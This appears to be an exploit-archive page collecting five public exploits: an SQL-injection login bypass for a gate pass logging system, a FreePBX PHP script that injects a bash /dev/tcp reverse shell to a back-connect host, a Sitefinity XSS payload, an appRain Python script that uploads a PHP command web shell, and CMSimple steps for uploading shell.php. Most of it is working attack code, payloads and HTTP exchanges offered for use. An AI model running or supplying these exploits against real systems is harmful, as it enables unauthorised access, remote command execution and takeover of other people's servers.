<pre><code># Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass<br /># Date: 29.05.2024<br /># Exploit Author: Furkan Eren Tetik<br /># Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.<br /><br />Steps To Reproduce:<br />1 - Go to the login page http://localhost/employee_gatepass/admin/login.php<br />2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.<br />3 - Click on "Login" button and you are logged in as administrator.<br /><br />PoC<br /><br />Request<br /><br />POST /employee_gatepass/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />Content-Length: 43<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/employee_gatepass/admin/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i<br />Connection: close<br /><br />username=admin'+or+'1'%3D'1&password=furkan<br /><br />--------------------------------------------------------------------------------------------------------------------------------<br /><br />response<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 29 May 2024 17:01:26 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30<br />X-Powered-By: PHP/8.0.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /></code></pre>
<pre><code># Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Cold z3ro<br /># Date: 6/1/2024<br /># Tested on: 14,15,16<br /># Vendor: https://www.freepbx.org/<br /><br /><?php<br />///<br />/// FREEPBX [14,15,16] API Module Authenticated RCE <br />/// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI<br />/// Cod[3]d by Cold z3ro <br />///<br />$url = "10.10.10.186"; // remote host<br />$backconnectip = "192.168.0.2";<br />$port = "4444"; <br />$PHPSESSID = "any valid session even extension";<br /><br /> echo "checking $url\n";<br /> $url = trim($url);<br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);<br /> curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);<br /> curl_setopt($ch, CURLOPT_TIMEOUT, 2);<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Referer: http://'.$url.'/admin/config.php?display=api',<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> ]);<br /> curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br /> echo $response = curl_exec($ch)."\n";<br /><br /> curl_close($ch);<br /><br />?><br /><br /></code></pre>
<pre><code># Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)<br /># Date: 2023-12-05<br /># Exploit Author: Aldi Saputra Wahyudi<br /># Vendor Homepage: https://www.progress.com/sitefinity-cms<br /># Version: < 15.0.0<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-27636<br /><br /># Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor<br /><br /># Steps To Reproduce:<br /><br />Attacker as lower privilege<br />Victim as Higher privilege<br /><br />1. Login as an Attacker<br />2. Go to the function using the SF Editor, go to the news page as example<br />3. Create or Edit news item<br />4. On the content form, insert the XSS payload as HTML<br />5. After the payload is inserted, click on the content form (just click) and publish or save<br />6. If the victim visits the page with XSS payload, XSS will be triggered<br /><br />Payload: <noalert><iframe src="javascript:alert(document.domain);"><br /><br /></code></pre>
<pre><code># Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 04/28/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://www.apprain.org<br /># Software Link:<br />https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip<br /># Version: latest<br /># Tested on: MacOS<br /><br />import requests<br />import sys<br />import time<br />import random<br />import string<br /><br />def generate_filename():<br />""" Generate a 5-character random string for filename. """<br />return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"<br /><br />def login(site, username, password):<br />print("Logging in...")<br />time.sleep(2)<br />login_url = f"https://{site}/admin/system"<br />session = requests.Session()<br />login_data = {<br />'data[Admin][admin_id]': username,<br />'data[Admin][admin_password]': password<br />}<br />headers = {<br />'Content-Type': 'application/x-www-form-urlencoded'<br />}<br />response = session.post(login_url, data=login_data, headers=headers)<br />if "Logout" in response.text:<br />print("Login Successful!")<br />return session<br />else:<br />print("Login Failed!")<br />sys.exit()<br /><br />def upload_shell(session, site):<br />print("Shell preparing...")<br />time.sleep(2)<br />filename = generate_filename()<br />upload_url = f"https://{site}/admin/filemanager/upload"<br />files = {<br />'data[filemanager][image]': (filename, "<html><body><form method='GET'<br />name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'<br />name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'<br />value='Execute'></form><pre><?php if(isset($_GET['cmd'])){<br />system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')<br />}<br />data = {<br />'submit': 'Upload'<br />}<br />response = session.post(upload_url, files=files, data=data)<br />if response.status_code == 200 and "uploaded successfully" in response.text:<br />print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")<br />else:<br />print("Exploit Failed!")<br />sys.exit()<br /><br />if __name__ == "__main__":<br />print("Exploiting...")<br />time.sleep(2)<br />if len(sys.argv) != 4:<br />print("Usage: python exploit.py sitename.com username password")<br />sys.exit()<br />site = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />session = login(site, username, password)<br />upload_shell(session, site)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: CMSimple 5.15 - Remote Command Execution<br /># Date: 04/28/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://www.cmsimple.org<br /># Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip<br /># Version: latest<br /># Tested on: MacOS<br /><br /># Log in to SimpleCMS.<br /># Go to Settings > CMS<br /># Append ",php" to the end of the Extensions_userfiles field and save it.<br /># Navigate to Files > Media<br /># Select and upload shell.php<br /># Your shell is ready: https://{url}/userfiles/media/shell.php<br /><br /></code></pre>
Archives
Categories
- All Exploits 4095
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow